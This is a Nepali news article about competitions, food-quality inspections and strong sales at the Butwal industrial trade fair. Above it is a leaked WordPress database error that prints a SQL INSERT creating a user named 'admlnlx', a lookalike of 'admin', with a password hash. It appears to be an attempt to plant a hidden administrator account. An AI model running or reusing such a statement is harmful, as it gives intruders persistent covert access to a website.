WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bgf/P9Bh2qUx5jPOEmQjdPFAFg1sWk/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 03:25:05', '', 'admlnlx', 'admlnlx')
बुटवल,पुस १२-
बुटवल उद्योग वाणिज्य संघको आयोजनामा बुटवलमा जारी औद्योगिक व्यापार मेलामा बिभिन्न प्रतियोगिताहरु भइरहेका छन ।
मेलाका अवसरमा लोक दोहोरी गीत प्रतियोगिता, भ्वाइस अफ बुटवल र कृषि बालि प्रतियोगिता भइरहेका छन । त्यस्तैबिद्यालयस्तरीय लोक नृत्य, आमा र युगल नृत्य प्रतियोगिता पनि मेलामा आयोजना गरीदै छ । मेलाकै अवसरमा आजदेखि माछा मार्ने बल्छी प्रतियोगिता पनि सुरु भएको छ ।
प्रतियोगिताको कृषि बिकास कार्यालय रुपन्देहीका प्रमुख भोजराज सापकोटाले उदघाटन गर्नु भयो । त्यस अवसरमा बोल्दै सापकोटाले बुटवलमा आयोजना हुने मेला किसान र उद्यमीका लागि सिक्ने थलो भएको बताउनु भयो । बाहिरबाट हेर्दा रमाइलो पनि लाग्न सक्छ तर भित्र पसेर हेर्दा जस्लाई जे चाहियो त्यो यहा पाइन्छ त्यसैले आफुले चाहेअनुसारको लाभ लिन उहाले सबैलाई आग्रह गर्नुभयो ।
मेलामा राखिएका खाद्य पदार्थ सहित खाना नास्ता पेय पदार्थको गुणस्तरका सम्वन्धमा आज मेला अन्र्तगतको अनुगमन समिति र जिल्ला बजार अनुगमन समितिले अनुगमन गरेको छ । संघका बरिष्ठ उपाध्यक्ष तथा मेलाका सहसंयोजक खिम बहादुर हमाल सहित बाणिज्य कार्यालय रुपन्देहीका प्रमुख बेद प्रकाश उपाध्याय, इलाका प्रशासन कार्यालय बुटवलका अधिकृत रमेश गौतम, खाद्य तथा गुण नियन्त्रण कार्यालयका अधिकृत बिक्रम लिम्वु, नेपाल पत्रकार महासंघ रुपन्देहीका अध्यक्ष शेर बहादुर केसी र डायलसन अधिकारी सम्मिलित टोलीले अनुगमन गरेको थियो ।
अन्यत्रका मेलामा भन्दा निकै व्यवस्थित रुपमा स्टल र वस्तुहरु राखेको पाइएको र आपनै होटलमा जस्तै मेलामा पनि अधिकांश प्रतिष्ठानले सेवा दिएकोपाइएको बाणिज्य कार्यालयका प्रमुख उपाध्यायलेबताउनु भयो । उहाले होटल तथा रेष्टुरेण्टहरुलाई भान्सा सफा राख्न, कुकहरुलाई टाउकोमा कपडा (एप्रोन ) लगाउन र सबै किसीमका खाद्य परिकारलाई सफा कपडा वा जालीले छोपेर राख्न निर्देशन दिइएकोपनि बताउनु भयो ।
मेलाको सुरु देखि नै कारोवार समेत निकै राम्रो पाइएको छ । कृषि औजार, कृषि प्रबिधि सहित २ वटा ठुला गाडी पनि मेलाबाट बिक्रि भएका छन ।पटक पटकको बन्दले मेलाको पुर्व तयारीमा समस्या भएपनि मेलाको सुरुवाद संगै गरीको व्यवस्थापनले कारोवारमा समेत उत्साह थपेको संघका कोषाध्यक्ष दिनेश प्रसाद श्रेष्ठले बताउनु भयो । मेलाको तयारीमा सुरुमा सबैकारोवारको विरण लिन नभ्याएको भएपनि ४ दिनमा २ करोड बढीको कारोवार भएको श्रेष्ठले बताउनु भयो ।